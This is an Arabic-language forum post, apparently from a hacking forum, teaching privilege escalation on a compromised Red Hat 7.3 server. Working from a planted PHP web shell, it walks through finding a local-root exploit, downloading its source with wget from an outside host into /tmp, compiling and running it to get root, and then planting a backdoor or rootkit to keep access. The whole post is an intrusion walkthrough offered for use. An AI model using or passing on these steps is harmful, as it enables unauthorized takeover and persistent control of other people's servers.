السلام عليكم ورحمة الله ..
اخواني الاعضاء .. بعد فتره ليست بقليله عن غيابي بالمنتدى ..
اعود اليكم من جديد .. وبموضوع جديد .. وان شاء الله تستفيدون منه ومايكون فيه اخطاء
والي جعلني اكتب الموضوع سببين السب الأول وهو كثره الاسئله حول الموضوع والسبب الثاني وهو عدم وجود مواضيع مثل هذا الموضوع .. واتمنى ان الاستفاده .. ويرجى القراءه بتمعن عشان تفهم لو مافهمت
راح نتطرق بموضوعنا الى شيئين مهمين :
1- طريقة البحث عن اكيسبلويتات النظام
2- اخذ رووت على السيرفر
=============================
بسم الله نبدأ :-
1- طريقة البحث عن الاكسبلويتات
اول شيء اخوي رح للشيل phpshell واكتب الأمر التالي :
طيب يالحبيب .. الامر هذا راح يجيب لنا اشياء مهمه وهي :
النظام واصدار الكيرنل ..
طيب الحين بتقول انا كتبت الأمر وطلع لي الاتي :
Red Hat Linux release 7.3 (Valhalla)
Kernel \r on an \m
اها كذا تمام ..
يتبين لنا ان النظام هو رد هات red hat linux لينكس رد هات
والاصدار هو 7.3
مممممممم الحين هذا الاصدار فيه لها اكسبلويتات تعطيك لوكل رووت
الحين رح لأي موقع سيكورتي .. مثل :
securityfocus.com
أو
http://www.securiteam.com
واكتب في مربع البحث التالي :
Red Hat Linux release 7.3
ودور على اكسبلويت يعطيك لوكل رووت ..
طيب انت الحين بتقولي طلعت لي صفحات كثيره وووو ...
بقوله لو تبي معلومات اشمل .. اقرا عناوينها .. لين تحصل موضوع عن اكسبلويت يديك لوكل رووت .. وممكن تلقى مواضيع تفيدك
ولو ماتبي .. ( انا افضل الطريقه هذي )
رح افتح جوجل واكتب مثلا :
Red Hat Linux release 7.3 exploit
وابحث عن الي فيها local root
اوووووو بس انا حصلت هذا الاكسبلويت :
http://x82.inetcop.org/h0me/c0de/0x82-GNATS_sux.c
طيب شباب الحين انتهينى من القسم الأول من الموضوع ..
انشالله الان فهمتو الطريقه تمام ..
===========================
2-اخذ رووت على السيرفر
طيب يالشيخ بعد ماحصلت على الاكسبلويت للنظام ..
الحين رح اكتب الأمر بالشيل :
id
وطلعت لي الصلاحيات يوزر
uid=33(www-data) gid=33(www-data) groups=33(www-data)
طيب الان ننتقل للملف tmp
نكتب الأمر
cd /tmp
عشان ندخل الملف tmp
وبعدها نكتب الأمر
pwd
وراح يطلع لك
tmp/
هذا معناه انك اكيد بملف tmp ـ (6)
طيب الحين نكتب الأمر wget بالشيل
واذا طلع لنا كذا :
wget: missing URL
..........
يعني تمام
واذا طلع كلام يختلف عن الي طلع لي قبل شوي .. لازم نسوي تصريح 777
والطريقه هي اكتب الامر هذا :
chmod 777 tmp
المهم الان ..
نروح نكتب الأمر هذا :
wget
http://x82.inetcop.org/h0me/c0de/0x82-GNATS_sux.c
عشان نجيب الاكسبلويت للشيل ..
وبعدها نكتب الأمر :
ls
وتطلع لنا الملفات الي بـ tmp
وراح يطلع من ضمنها الملف :
0x82-GNATS_sux.c
تمام الشغل الان 100%
طيب نسوي كومبايل للملف 0x82-GNATS_sux.c
بالطريقه هذي :
gcc -o 0x82-GNATS_sux 0x82-GNATS_sux.c
يعني نكتب الامر :
gcc -o
وبعده اسم ملف الاكسبلويت
وبعد اسم ملف الاكسبلويت نكتب اسم الملف مع الامتداد وهو .c
طيب الان بعد كذا نكتب الأمر :
ls
وراح تطلع لنا الملفات مره اخرى الي بملف الـ tmp
راح تلاحظ وجود الملف نفسه ولاكن بدون امتداد بالشكل كذا :
0x82-GNATS_sux
0x82-GNATS_sux.c
وهذا يعني ان كل شيء ميه ميه واننا سوينا كومبيل للملف
طيب الان نشغل الملف 0x82-GNATS_sux
بالأمر :
كود PHP:
./0x82-GNATS_sux
طيب بعد كذا نروح نكتب بالشيل الأمر :
id
اووووووووه بس انت الان رووت
وطلعت لك الصلاحيات رووت
هنيئا لك
طيب الان ياشباب بعد كذا بتقولون وش اسوي .. بقولكم رحو ارفعو باكدور
عشان تضمن رجوعك للسيرفر باي وقت
رح ابحث هنا بالمنتدى وتجد كل شيء عن الباكدور ..
أو الرووت كيت على الأقل
طيب بتقولون وش اسوي بعد الباكدور .. راح تسوي اشياء كثير مره .
ابحث عنها وعاد انت وراسك
وراح اشرح وش تسوي بعد الرووت قريــب إن شاء الله
وتمنى منكم ان تستفيدون من الموضوع
وآسف على الإطاله وايضا لاني ماشرحت بالصور وذلك بسبب انشغالي ووقتي الضيق .. واسف لاني قصرت معاكم بالمنتدى اسالو الاخ تامر انا ضيق
النمط الخطي
